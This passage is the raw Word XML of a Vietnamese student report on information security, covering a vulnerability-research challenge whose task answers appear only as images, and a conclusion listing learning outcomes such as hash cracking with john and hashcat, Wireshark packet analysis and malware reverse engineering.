          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ được giới thiệu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226EB015" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lỗ hổng bảo mật là gì</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B65C7FD" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tại sao chúng đáng để tìm hiểu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB5DB6C" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Các lỗ hổng được đánh giá như thế nào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAFA603" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Cơ sở dữ liệu để nghiên cứu lỗ hổng bảo mật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26808A85" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Giới thiệu về cách nghiên cứu lỗ hổng được sử dụng đối với sự tham gia của ACKme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4EEA75" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A8551AF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc90050803"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.7.2. Các task của thử thách</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w14:paraId="179B95D8" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Task 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D04F31" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="437076BC" wp14:editId="4C87E808">
            <wp:extent cx="5731510" cy="929005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="929005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="407AEED5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Task 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472927A9" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14DD5DAA" wp14:editId="0B5F05AC">
            <wp:extent cx="5731510" cy="1934210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1934210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E366C6" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Task 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA6E60" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02995EC7" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="576952D4" wp14:editId="7E9B6375">
            <wp:extent cx="5731510" cy="1144905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1144905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D59C2F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Task 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD59124" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A43748B" wp14:editId="78DAC7D8">
            <wp:extent cx="5731510" cy="640080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="640080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="752DE94B" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Task 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5BCC91" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C319104" wp14:editId="149547DB">
            <wp:extent cx="5731510" cy="1764665"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1764665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3CD4A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A7580B" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc90050804"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CHƯƠNG 4: KẾT LUẬN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="45E94E66" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Thông qua học phần và quá trình làm báo cáo nhóm em đã đạt được những kết quả như:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227185EF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>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iểu định nghĩa về bảo mật thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782BE45C" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>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iểu các đặc điểm quan trọng của thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E482A6" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>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iểu mô hình toàn diện về bảo mật thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4775036E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>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Vạch ra các cách tiếp cận để thực hiện an toàn thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1166BA" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>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Vạch ra các giai đoạn của vòng đời phát triển hệ thống an ninh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099EF0A0" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>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Hiểu các điều khoản chính về bảo mật thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C59030D" w14:textId="1D4F288F" w:rsidR="006F1FD5" w:rsidRDefault="001F7EFA" w:rsidP="003C65F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Áp dụng các kiến thức về bảo mật vào cuộc sống và xây dựng ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D3C78D" w14:textId="0CB1DFAF" w:rsidR="003C65F8" w:rsidRDefault="003C65F8" w:rsidP="003C65F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Thực hành được các kiến thức mã hóa dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3A4680" w14:textId="54C4B13C" w:rsidR="003C65F8" w:rsidRDefault="003C65F8" w:rsidP="003C65F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sử dụng các công cụ như john, hashcat để dò mật khẩu đã được hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D02EC1" w14:textId="12B0E16F" w:rsidR="003C65F8" w:rsidRDefault="003C65F8" w:rsidP="003C65F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sử dụng công cụ Wireshark để bắt và phân tích gói tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7267A679" w14:textId="78CE4C39" w:rsidR="003C65F8" w:rsidRPr="003C65F8" w:rsidRDefault="003C65F8" w:rsidP="003C65F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Hiểu được c</w:t>
      </w:r>
      <w:r w:rsidRPr="003C65F8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ách thức dịch ngược chương trình Malware để phân tích code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
